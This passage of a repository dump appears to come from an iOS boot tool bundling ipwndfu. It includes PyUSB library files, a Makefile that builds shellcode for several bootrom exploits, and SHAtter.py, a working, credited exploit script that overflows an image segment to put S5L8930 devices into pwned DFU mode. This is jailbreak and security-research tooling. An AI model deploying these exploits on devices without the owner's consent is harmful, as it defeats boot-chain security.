56 | ret = device.ctrl_transfer(0xA1, 2, 0, 0, part, 5000)
57 | assert len(ret) == part
58 | data += ret.tostring()
59 | amount -= part
60 | return data
61 |
62 | def request_image_validation(device):
63 | #print 'Requesting image validation.'
64 | assert device.ctrl_transfer(0x21, 1, 0, 0, '', 1000) == 0
65 | device.ctrl_transfer(0xA1, 3, 0, 0, 6, 1000)
66 | device.ctrl_transfer(0xA1, 3, 0, 0, 6, 1000)
67 | device.ctrl_transfer(0xA1, 3, 0, 0, 6, 1000)
68 | usb_reset(device)
69 |
--------------------------------------------------------------------------------
/resources/ipwndfu/libusbfinder/bottles/libusb-1.0.19.mountain_lion.bottle.1.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu/libusbfinder/bottles/libusb-1.0.19.mountain_lion.bottle.1.tar.gz
--------------------------------------------------------------------------------
/resources/ipwndfu/libusbfinder/bottles/libusb-1.0.20.mavericks.bottle.1.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu/libusbfinder/bottles/libusb-1.0.20.mavericks.bottle.1.tar.gz
--------------------------------------------------------------------------------
/resources/ipwndfu/libusbfinder/bottles/libusb-1.0.21.yosemite.bottle.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu/libusbfinder/bottles/libusb-1.0.21.yosemite.bottle.tar.gz
--------------------------------------------------------------------------------
/resources/ipwndfu/libusbfinder/bottles/libusb-1.0.22.el_capitan.bottle.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu/libusbfinder/bottles/libusb-1.0.22.el_capitan.bottle.tar.gz
--------------------------------------------------------------------------------
/resources/ipwndfu/libusbfinder/bottles/libusb-1.0.22.high_sierra.bottle.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu/libusbfinder/bottles/libusb-1.0.22.high_sierra.bottle.tar.gz
--------------------------------------------------------------------------------
/resources/ipwndfu/libusbfinder/bottles/libusb-1.0.22.mojave.bottle.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu/libusbfinder/bottles/libusb-1.0.22.mojave.bottle.tar.gz
--------------------------------------------------------------------------------
/resources/ipwndfu/libusbfinder/bottles/libusb-1.0.22.sierra.bottle.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu/libusbfinder/bottles/libusb-1.0.22.sierra.bottle.tar.gz
--------------------------------------------------------------------------------
/resources/ipwndfu/usb/ACKNOWLEDGEMENTS:
--------------------------------------------------------------------------------
1 | Alan Aguiar
2 | jaseg
3 | Johannes Stezenbach
4 | Marijn van Vliet
5 | Stefano Di Martino
6 | Simon Norberg
7 | iThompson
8 | Harry Bock
9 | ponty
10 | Chris Clark
11 | themperek
12 | David Halter
13 | Robert von Burg
14 | James Rowe
15 | Braiden Kindt
16 | Tormod Volden
17 | Chris Clark
18 | Emmanuel Blot
19 | Peter Bigot
20 | Travis Robinson
21 | Xiaofan Chen
22 | Poul-Henning Kamp
23 | Thomas Reitmayr
24 | Carl Ritson
25 | Romain Aviolat
26 | Walker Inman
27 | Prathmesh Prabhu
28 | André Erdmann
29 | Jeffrey Nichols
30 | Deliang Fan
31 | Matthew Chan
32 | Maximilian Köhl
33 |
--------------------------------------------------------------------------------
/resources/ipwndfu/usb/LICENSE:
--------------------------------------------------------------------------------
1 | Copyright (C) 2009-2014 Wander Lairson Costa. All Rights Reserved.
2 |
3 | Redistribution and use in source and binary forms, with or without
4 | modification, are permitted provided that the following conditions
5 | are met:
6 |
7 | 1. Redistributions of source code must retain the above copyright
8 | notice, this list of conditions and the following disclaimer.
9 |
10 | 2. Redistributions in binary form must reproduce the above copyright
11 | notice, this list of conditions and the following disclaimer in the
12 | documentation and/or other materials provided with the distribution.
13 |
14 | 3. The name of the author may not be used to endorse or promote products
15 | derived from this software without specific prior written permission.
16 |
17 | THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR IMPLIED
18 | WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
19 | MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
20 | EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
21 | EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
22 | OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
23 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
24 | CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
25 | IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY
26 | OF SUCH DAMAGE.
27 |
28 |
--------------------------------------------------------------------------------
/resources/ipwndfu/usb/__init__.py:
--------------------------------------------------------------------------------
1 | # Copyright (C) 2009-2014 Wander Lairson Costa
2 | #
3 | # The following terms apply to all files associated
4 | # with the software unless explicitly disclaimed in individual files.
5 | #
6 | # The authors hereby grant permission to use, copy, modify, distribute,
7 | # and license this software and its documentation for any purpose, provided
8 | # that existing copyright notices are retained in all copies and that this
9 | # notice is included verbatim in any distributions. No written agreement,
10 | # license, or royalty fee is required for any of the authorized uses.
11 | # Modifications to this software may be copyrighted by their authors
12 | # and need not follow the licensing terms described here, provided that
13 | # the new terms are clearly indicated on the first page of each file where
14 | # they apply.
15 | #
16 | # IN NO EVENT SHALL THE AUTHORS OR DISTRIBUTORS BE LIABLE TO ANY PARTY
17 | # FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES
18 | # ARISING OUT OF THE USE OF THIS SOFTWARE, ITS DOCUMENTATION, OR ANY
19 | # DERIVATIVES THEREOF, EVEN IF THE AUTHORS HAVE BEEN ADVISED OF THE
20 | # POSSIBILITY OF SUCH DAMAGE.
21 | #
22 | # THE AUTHORS AND DISTRIBUTORS SPECIFICALLY DISCLAIM ANY WARRANTIES,
23 | # INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY,
24 | # FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. THIS SOFTWARE
25 | # IS PROVIDED ON AN "AS IS" BASIS, AND THE AUTHORS AND DISTRIBUTORS HAVE
26 | # NO OBLIGATION TO PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR
27 | # MODIFICATIONS.
28 |
29 | r"""PyUSB - Easy USB access in Python
30 |
31 | This package exports the following modules and subpackages:
32 |
33 | core - the main USB implementation
34 | legacy - the compatibility layer with 0.x version
35 | backend - the support for backend implementations.
36 | control - USB standard control requests.
37 | libloader - helper module for backend library loading.
38 |
39 | Since version 1.0, main PyUSB implementation lives in the 'usb.core'
40 | module. New applications are encouraged to use it.
41 | """
42 |
43 | import logging
44 | import os
45 |
46 | __author__ = 'Wander Lairson Costa'
47 |
48 | # Use Semantic Versioning, http://semver.org/
49 | version_info = (1, 0, 0)
50 | __version__ = '%d.%d.%d' % version_info
51 |
52 | __all__ = ['legacy', 'control', 'core', 'backend', 'util', 'libloader']
53 |
54 | def _setup_log():
55 | from usb import _debug
56 | logger = logging.getLogger('usb')
57 | debug_level = os.getenv('PYUSB_DEBUG')
58 |
59 | if debug_level is not None:
60 | _debug.enable_tracing(True)
61 | filename = os.getenv('PYUSB_LOG_FILENAME')
62 |
63 | LEVELS = {'debug': logging.DEBUG,
64 | 'info': logging.INFO,
65 | 'warning': logging.WARNING,
66 | 'error': logging.ERROR,
67 | 'critical': logging.CRITICAL}
68 |
69 | level = LEVELS.get(debug_level, logging.CRITICAL + 10)
70 | logger.setLevel(level = level)
71 |
72 | try:
73 | handler = logging.FileHandler(filename)
74 | except:
75 | handler = logging.StreamHandler()
76 |
77 | fmt = logging.Formatter('%(asctime)s %(levelname)s:%(name)s:%(message)s')
78 | handler.setFormatter(fmt)
79 | logger.addHandler(handler)
80 | else:
81 | class NullHandler(logging.Handler):
82 | def emit(self, record):
83 | pass
84 |
85 | # We set the log level to avoid delegation to the
86 | # parent log handler (if there is one).
87 | # Thanks to Chris Clark to pointing this out.
88 | logger.setLevel(logging.CRITICAL + 10)
89 |
90 | logger.addHandler(NullHandler())
91 |
92 |
93 | _setup_log()
94 |
95 | # We import all 'legacy' module symbols to provide compatibility
96 | # with applications that use 0.x versions.
97 | from usb.legacy import *
98 |
--------------------------------------------------------------------------------
/resources/ipwndfu/usb/_debug.py:
--------------------------------------------------------------------------------
1 | # Copyright (C) 2009-2014 Wander Lairson Costa
2 | #
3 | # The following terms apply to all files associated
4 | # with the software unless explicitly disclaimed in individual files.
5 | #
6 | # The authors hereby grant permission to use, copy, modify, distribute,
7 | # and license this software and its documentation for any purpose, provided
8 | # that existing copyright notices are retained in all copies and that this
9 | # notice is included verbatim in any distributions. No written agreement,
10 | # license, or royalty fee is required for any of the authorized uses.
11 | # Modifications to this software may be copyrighted by their authors
12 | # and need not follow the licensing terms described here, provided that
13 | # the new terms are clearly indicated on the first page of each file where
14 | # they apply.
15 | #
16 | # IN NO EVENT SHALL THE AUTHORS OR DISTRIBUTORS BE LIABLE TO ANY PARTY
17 | # FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES
18 | # ARISING OUT OF THE USE OF THIS SOFTWARE, ITS DOCUMENTATION, OR ANY
19 | # DERIVATIVES THEREOF, EVEN IF THE AUTHORS HAVE BEEN ADVISED OF THE
20 | # POSSIBILITY OF SUCH DAMAGE.
21 | #
22 | # THE AUTHORS AND DISTRIBUTORS SPECIFICALLY DISCLAIM ANY WARRANTIES,
23 | # INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY,
24 | # FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. THIS SOFTWARE
25 | # IS PROVIDED ON AN "AS IS" BASIS, AND THE AUTHORS AND DISTRIBUTORS HAVE
26 | # NO OBLIGATION TO PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR
27 | # MODIFICATIONS.
28 |
29 | __author__ = 'Wander Lairson Costa'
30 |
31 | __all__ = ['methodtrace', 'functiontrace']
32 |
33 | import logging
34 | import usb._interop as _interop
35 |
36 | _enable_tracing = False
37 |
38 | def enable_tracing(enable):
39 | global _enable_tracing
40 | _enable_tracing = enable
41 |
42 | def _trace_function_call(logger, fname, *args, **named_args):
43 | logger.debug(
44 | # TODO: check if 'f' is a method or a free function
45 | fname + '(' + \
46 | ', '.join((str(val) for val in args)) + \
47 | ', '.join((name + '=' + str(val) for name, val in named_args.items())) + ')'
48 | )
49 |
50 | # decorator for methods calls tracing
51 | def methodtrace(logger):
52 | def decorator_logging(f):
53 | if not _enable_tracing:
54 | return f
55 | def do_trace(*args, **named_args):
56 | # this if is just a optimization to avoid unecessary string formatting
57 | if logging.DEBUG >= logger.getEffectiveLevel():
58 | fn = type(args[0]).__name__ + '.' + f.__name__
59 | _trace_function_call(logger, fn, *args[1:], **named_args)
60 | return f(*args, **named_args)
61 | _interop._update_wrapper(do_trace, f)
62 | return do_trace
63 | return decorator_logging
64 |
65 | # decorator for methods calls tracing
66 | def functiontrace(logger):
67 | def decorator_logging(f):
68 | if not _enable_tracing:
69 | return f
70 | def do_trace(*args, **named_args):
71 | # this if is just a optimization to avoid unecessary string formatting
72 | if logging.DEBUG >= logger.getEffectiveLevel():
73 | _trace_function_call(logger, f.__name__, *args, **named_args)
74 | return f(*args, **named_args)
75 | _interop._update_wrapper(do_trace, f)
76 | return do_trace
77 | return decorator_logging
78 |
--------------------------------------------------------------------------------
/resources/ipwndfu/usb/_interop.py:
--------------------------------------------------------------------------------
1 | # Copyright (C) 2009-2014 Wander Lairson Costa
2 | #
3 | # The following terms apply to all files associated
4 | # with the software unless explicitly disclaimed in individual files.
5 | #
6 | # The authors hereby grant permission to use, copy, modify, distribute,
7 | # and license this software and its documentation for any purpose, provided
8 | # that existing copyright notices are retained in all copies and that this
9 | # notice is included verbatim in any distributions. No written agreement,
10 | # license, or royalty fee is required for any of the authorized uses.
11 | # Modifications to this software may be copyrighted by their authors
12 | # and need not follow the licensing terms described here, provided that
13 | # the new terms are clearly indicated on the first page of each file where
14 | # they apply.
15 | #
16 | # IN NO EVENT SHALL THE AUTHORS OR DISTRIBUTORS BE LIABLE TO ANY PARTY
17 | # FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES
18 | # ARISING OUT OF THE USE OF THIS SOFTWARE, ITS DOCUMENTATION, OR ANY
19 | # DERIVATIVES THEREOF, EVEN IF THE AUTHORS HAVE BEEN ADVISED OF THE
20 | # POSSIBILITY OF SUCH DAMAGE.
21 | #
22 | # THE AUTHORS AND DISTRIBUTORS SPECIFICALLY DISCLAIM ANY WARRANTIES,
23 | # INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY,
24 | # FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. THIS SOFTWARE
25 | # IS PROVIDED ON AN "AS IS" BASIS, AND THE AUTHORS AND DISTRIBUTORS HAVE
26 | # NO OBLIGATION TO PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR
27 | # MODIFICATIONS.
28 |
29 | # All the hacks necessary to assure compatibility across all
30 | # supported versions come here.
31 | # Please, note that there is one version check for each
32 | # hack we need to do, this makes maintenance easier... ^^
33 |
34 | import sys
35 | import array
36 |
37 | __all__ = ['_reduce', '_set', '_next', '_update_wrapper']
38 |
39 | # we support Python >= 2.4
40 | assert sys.hexversion >= 0x020400f0
41 |
42 | # On Python 3, reduce became a functools module function
43 | try:
44 | import functools
45 | _reduce = functools.reduce
46 | except (ImportError, AttributeError):
47 | _reduce = reduce
48 |
49 | # all, introduced in Python 2.5
50 | try:
51 | _all = all
52 | except NameError:
53 | _all = lambda iter_ : _reduce( lambda x, y: x and y, iter_, True )
54 |
55 | # we only have the builtin set type since 2.5 version
56 | try:
57 | _set = set
58 | except NameError:
59 | import sets
60 | _set = sets.Set
61 |
62 | # On Python >= 2.6, we have the builtin next() function
63 | # On Python 2.5 and before, we have to call the iterator method next()
64 | def _next(iter):
65 | try:
66 | return next(iter)
67 | except NameError:
68 | return iter.next()
69 |
70 | # functools appeared in 2.5
71 | try:
72 | import functools
73 | _update_wrapper = functools.update_wrapper
74 | except (ImportError, AttributeError):
75 | def _update_wrapper(wrapper, wrapped):
76 | wrapper.__name__ = wrapped.__name__
77 | wrapper.__module__ = wrapped.__module__
78 | wrapper.__doc__ = wrapped.__doc__
79 | wrapper.__dict__ = wrapped.__dict__
80 |
81 | # this is used (as of May 2015) twice in core, once in backend/openusb, and in
82 | # some unit test code. It would probably be clearer if written in terms of some
83 | # definite 3.2+ API (bytearrays?) with a fallback provided for 2.4+.
84 | def as_array(data=None):
85 | if data is None:
86 | return array.array('B')
87 |
88 | if isinstance(data, array.array):
89 | return data
90 |
91 | try:
92 | return array.array('B', data)
93 | except TypeError:
94 | # When you pass a unicode string or a character sequence,
95 | # you get a TypeError if the first parameter does not match
96 | a = array.array('B')
97 | a.fromstring(data) # deprecated since 3.2
98 | return a
99 |
--------------------------------------------------------------------------------
/resources/ipwndfu/usb/_lookup.py:
--------------------------------------------------------------------------------
1 | # Copyright (C) 2009-2014 Walker Inman
2 | #
3 | # The following terms apply to all files associated
4 | # with the software unless explicitly disclaimed in individual files.
5 | #
6 | # The authors hereby grant permission to use, copy, modify, distribute,
7 | # and license this software and its documentation for any purpose, provided
8 | # that existing copyright notices are retained in all copies and that this
9 | # notice is included verbatim in any distributions. No written agreement,
10 | # license, or royalty fee is required for any of the authorized uses.
11 | # Modifications to this software may be copyrighted by their authors
12 | # and need not follow the licensing terms described here, provided that
13 | # the new terms are clearly indicated on the first page of each file where
14 | # they apply.
15 | #
16 | # IN NO EVENT SHALL THE AUTHORS OR DISTRIBUTORS BE LIABLE TO ANY PARTY
17 | # FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES
18 | # ARISING OUT OF THE USE OF THIS SOFTWARE, ITS DOCUMENTATION, OR ANY
19 | # DERIVATIVES THEREOF, EVEN IF THE AUTHORS HAVE BEEN ADVISED OF THE
20 | # POSSIBILITY OF SUCH DAMAGE.
21 | #
22 | # THE AUTHORS AND DISTRIBUTORS SPECIFICALLY DISCLAIM ANY WARRANTIES,
23 | # INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY,
24 | # FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. THIS SOFTWARE
25 | # IS PROVIDED ON AN "AS IS" BASIS, AND THE AUTHORS AND DISTRIBUTORS HAVE
26 | # NO OBLIGATION TO PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR
27 | # MODIFICATIONS.
28 |
29 | r"""usb._lookups - Lookup tables for USB
30 | """
31 |
32 | descriptors = {
33 | 0x1 : "Device",
34 | 0x2 : "Configuration",
35 | 0x3 : "String",
36 | 0x4 : "Interface",
37 | 0x5 : "Endpoint",
38 | 0x6 : "Device qualifier",
39 | 0x7 : "Other speed configuration",
40 | 0x8 : "Interface power",
41 | 0x9 : "OTG",
42 | 0xA : "Debug",
43 | 0xB : "Interface association",
44 | 0xC : "Security",
45 | 0xD : "Key",
46 | 0xE : "Encryption type",
47 | 0xF : "Binary device object store (BOS)",
48 | 0x10 : "Device capability",
49 | 0x11 : "Wireless endpoint companion",
50 | 0x30 : "SuperSpeed endpoint companion",
51 | }
52 |
53 | device_classes = {
54 | 0x0 : "Specified at interface",
55 | 0x2 : "Communications Device",
56 | 0x9 : "Hub",
57 | 0xF : "Personal Healthcare Device",
58 | 0xDC : "Diagnostic Device",
59 | 0xE0 : "Wireless Controller",
60 | 0xEF : "Miscellaneous",
61 | 0xFF : "Vendor-specific",
62 | }
63 |
64 | interface_classes = {
65 | 0x0 : "Reserved",
66 | 0x1 : "Audio",
67 | 0x2 : "CDC Communication",
68 | 0x3 : "Human Interface Device",
69 | 0x5 : "Physical",
70 | 0x6 : "Image",
71 | 0x7 : "Printer",
72 | 0x8 : "Mass Storage",
73 | 0x9 : "Hub",
74 | 0xA : "CDC Data",
75 | 0xB : "Smart Card",
76 | 0xD : "Content Security",
77 | 0xE : "Video",
78 | 0xF : "Personal Healthcare",
79 | 0xDC : "Diagnostic Device",
80 | 0xE0 : "Wireless Controller",
81 | 0xEF : "Miscellaneous",
82 | 0xFE : "Application Specific",
83 | 0xFF : "Vendor Specific",
84 | }
85 |
86 | ep_attributes = {
87 | 0x0 : "Control",
88 | 0x1 : "Isochronous",
89 | 0x2 : "Bulk",
90 | 0x3 : "Interrupt",
91 | }
92 |
93 | MAX_POWER_UNITS_USB2p0 = 2 # mA
94 | MAX_POWER_UNITS_USB_SUPERSPEED = 8 # mA
95 |
--------------------------------------------------------------------------------
/resources/ipwndfu/utilities.py:
--------------------------------------------------------------------------------
1 | import subprocess, sys
2 |
3 | def apply_patches(binary, patches):
4 | for (offset, data) in patches:
5 | binary = binary[:offset] + data + binary[offset + len(data):]
6 | return binary
7 |
8 | def aes_decrypt(data, iv, key):
9 | if len(key) == 32:
10 | aes = 128
11 | elif len(key) == 64:
12 | aes = 256
13 | else:
14 | print 'ERROR: Bad AES key given to aes_decrypt. Exiting.'
15 | sys.exit(1)
16 |
17 | p = subprocess.Popen(['openssl', 'enc', '-aes-%s-cbc' % aes, '-d', '-nopad', '-iv', iv, '-K', key],
18 | stdout=subprocess.PIPE,
19 | stdin=subprocess.PIPE,
20 | stderr=subprocess.PIPE)
21 | (stdout, stderr) = p.communicate(input=data)
22 |
23 | if p.returncode != 0 or len(stderr) > 0:
24 | print 'ERROR: openssl failed: %s' % stderr
25 | sys.exit(1)
26 |
27 | return stdout
28 |
29 | def hex_dump(data, address):
30 | p = subprocess.Popen(['xxd', '-o', str(address)], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
31 | (stdout, stderr) = p.communicate(input=data)
32 |
33 | if p.returncode != 0 or len(stderr) > 0:
34 | print 'ERROR: xxd failed: %s' % stderr
35 | sys.exit(1)
36 |
37 | return stdout
38 |
--------------------------------------------------------------------------------
/resources/ipwndfu8010/.gitignore:
--------------------------------------------------------------------------------
1 | *.pyc
2 | nor-backups/nor-*
3 | libusbfinder/libusb-*
4 | SecureROM-*
5 | n88ap-iBSS-4.3.5.img3
6 | *.ipsw
7 | .DS_Store
8 |
--------------------------------------------------------------------------------
/resources/ipwndfu8010/Makefile:
--------------------------------------------------------------------------------
1 | all: armv6 armv7 arm64
2 |
3 | armv6:
4 | arm-none-eabi-as -march=armv6 -mthumb --fatal-warnings -o bin/steaks4uce-shellcode.o src/steaks4uce-shellcode.S
5 | arm-none-eabi-objcopy -O binary bin/steaks4uce-shellcode.o bin/steaks4uce-shellcode.bin
6 | rm bin/steaks4uce-shellcode.o
7 |
8 | armv7:
9 | arm-none-eabi-as -mthumb --fatal-warnings -o bin/limera1n-shellcode.o src/limera1n-shellcode.S
10 | arm-none-eabi-objcopy -O binary bin/limera1n-shellcode.o bin/limera1n-shellcode.bin
11 | rm bin/limera1n-shellcode.o
12 |
13 | arm-none-eabi-as -mthumb --fatal-warnings -o bin/SHAtter-shellcode.o src/SHAtter-shellcode.S
14 | arm-none-eabi-objcopy -O binary bin/SHAtter-shellcode.o bin/SHAtter-shellcode.bin
15 | rm bin/SHAtter-shellcode.o
16 |
17 | arm-none-eabi-as -mthumb --fatal-warnings -o bin/24Kpwn-shellcode.o src/24Kpwn-shellcode.S
18 | arm-none-eabi-objcopy -O binary bin/24Kpwn-shellcode.o bin/24Kpwn-shellcode.bin
19 | rm bin/24Kpwn-shellcode.o
20 |
21 | arm-none-eabi-as -mthumb --fatal-warnings -o bin/alloc8-shellcode.o src/alloc8-shellcode.S
22 | arm-none-eabi-objcopy -O binary bin/alloc8-shellcode.o bin/alloc8-shellcode.bin
23 | rm bin/alloc8-shellcode.o
24 |
25 | arm-none-eabi-as -mthumb --fatal-warnings -o bin/ibss-flash-nor-shellcode.o src/ibss-flash-nor-shellcode.S
26 | arm-none-eabi-objcopy -O binary bin/ibss-flash-nor-shellcode.o bin/ibss-flash-nor-shellcode.bin
27 | rm bin/ibss-flash-nor-shellcode.o
28 |
29 | arm-none-eabi-as -mthumb --fatal-warnings -o bin/usb_0xA1_2_armv7.o src/usb_0xA1_2_armv7.S
30 | arm-none-eabi-objcopy -O binary bin/usb_0xA1_2_armv7.o bin/usb_0xA1_2_armv7.bin
31 | rm bin/usb_0xA1_2_armv7.o
32 |
33 | arm-none-eabi-as -mthumb --fatal-warnings -o bin/checkm8_armv7.o src/checkm8_armv7.S
34 | arm-none-eabi-objcopy -O binary bin/checkm8_armv7.o bin/checkm8_armv7.bin
35 | rm bin/checkm8_armv7.o
36 |
37 | arm64:
38 | xcrun -sdk iphoneos clang src/usb_0xA1_2_arm64.S -target arm64-apple-darwin -Wall -o bin/usb_0xA1_2_arm64.o
39 | gobjcopy -O binary -j .text bin/usb_0xA1_2_arm64.o bin/usb_0xA1_2_arm64.bin
40 | rm bin/usb_0xA1_2_arm64.o
41 |
42 | xcrun -sdk iphoneos clang src/checkm8_arm64.S -target arm64-apple-darwin -Wall -o bin/checkm8_arm64.o
43 | gobjcopy -O binary -j .text bin/checkm8_arm64.o bin/checkm8_arm64.bin
44 | rm bin/checkm8_arm64.o
45 |
46 | xcrun -sdk iphoneos clang src/t8010_t8011_disable_wxn_arm64.S -target arm64-apple-darwin -Wall -o bin/t8010_t8011_disable_wxn_arm64.o
47 | gobjcopy -O binary -j .text bin/t8010_t8011_disable_wxn_arm64.o bin/t8010_t8011_disable_wxn_arm64.bin
48 | rm bin/t8010_t8011_disable_wxn_arm64.o
49 |
--------------------------------------------------------------------------------
/resources/ipwndfu8010/SHAtter.py:
--------------------------------------------------------------------------------
1 | # Credit: This file is based on SHAtter exploit (segment overflow) by posixninja and pod2g.
2 |
3 | import struct, sys, time
4 | import dfu
5 |
6 | def generate_payload():
7 | shellcode_address = 0x8402F198 + 1
8 | data = struct.pack('<40sI', '\xF0' * 40, shellcode_address)
9 | tags = data + struct.pack('<4s2I4s2I', 'SHSH'[::-1], 12, 0, 'CERT'[::-1], 12, 0)
10 | header = struct.pack('<4s3I4s', 'Img3'[::-1], 20 + len(tags), len(tags), len(data), 'ibss'[::-1])
11 | with open('bin/SHAtter-shellcode.bin', 'rb') as f:
12 | shellcode = f.read()
13 | assert len(shellcode) <= 1024
14 | return header + tags + shellcode
15 |
16 | def exploit():
17 | print '*** based on SHAtter exploit (segment overflow) by posixninja and pod2g ***'
18 |
19 | device = dfu.acquire_device()
20 | print 'Found:', device.serial_number
21 |
22 | if 'PWND:[' in device.serial_number:
23 | print 'Device is already in pwned DFU Mode. Not executing exploit.'
24 | return
25 |
26 | if 'CPID:8930' not in device.serial_number:
27 | print 'ERROR: Not a compatible device. This exploit is for S5L8930 devices only. Exiting.'
28 | sys.exit(1)
29 |
30 | if 'SRTG:[iBoot-574.4]' not in device.serial_number:
31 | print 'ERROR: CPID is compatible, but serial number string does not match.'
32 | print 'Make sure device is in SecureROM DFU Mode and not LLB/iBSS DFU Mode. Exiting.'
33 | sys.exit(1)
34 |
35 | dfu.reset_counters(device)
36 | dfu.get_data(device, 0x40)
37 | dfu.usb_reset(device)
38 | dfu.release_device(device)
39 |
40 | device = dfu.acquire_device()
41 | dfu.request_image_validation(device)
42 | dfu.release_device(device)
43 |
44 | device = dfu.acquire_device()
45 | dfu.get_data(device, 0x2C000)
46 | dfu.release_device(device)
47 |
48 | time.sleep(0.5)
49 |
50 | device = dfu.acquire_device()
51 | dfu.reset_counters(device)
52 | dfu.get_data(device, 0x140)
53 | dfu.usb_reset(device)
54 | dfu.release_device(device)
55 |
56 | device = dfu.acquire_device()
57 | dfu.request_image_validation(device)
58 | dfu.release_device(device)
59 |
60 | device = dfu.acquire_device()
61 | dfu.send_data(device, generate_payload())
62 | dfu.get_data(device, 0x2C000)
63 | dfu.release_device(device)
64 |
65 | time.sleep(0.5)
66 |
67 | device = dfu.acquire_device()
68 | failed = 'PWND:[SHAtter]' not in device.serial_number
69 | dfu.release_device(device)
70 |
71 | if failed:
72 | print 'ERROR: Exploit failed. Device did not enter pwned DFU Mode.'
73 | sys.exit(1)
74 |
75 | print 'Device is now in pwned DFU Mode.'
76 |
--------------------------------------------------------------------------------
/resources/ipwndfu8010/aes-keys/S5L8920-firmware:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu8010/aes-keys/S5L8920-firmware
--------------------------------------------------------------------------------
/resources/ipwndfu8010/bin/24Kpwn-shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu8010/bin/24Kpwn-shellcode.bin
--------------------------------------------------------------------------------
/resources/ipwndfu8010/bin/SHAtter-shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu8010/bin/SHAtter-shellcode.bin
--------------------------------------------------------------------------------
/resources/ipwndfu8010/bin/alloc8-shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu8010/bin/alloc8-shellcode.bin
--------------------------------------------------------------------------------
/resources/ipwndfu8010/bin/checkm8_arm64.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu8010/bin/checkm8_arm64.bin
--------------------------------------------------------------------------------
/resources/ipwndfu8010/bin/checkm8_armv7.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu8010/bin/checkm8_armv7.bin
--------------------------------------------------------------------------------
/resources/ipwndfu8010/bin/ibss-flash-nor-shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu8010/bin/ibss-flash-nor-shellcode.bin
--------------------------------------------------------------------------------
/resources/ipwndfu8010/bin/limera1n-shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu8010/bin/limera1n-shellcode.bin
--------------------------------------------------------------------------------
/resources/ipwndfu8010/bin/steaks4uce-shellcode.bin:
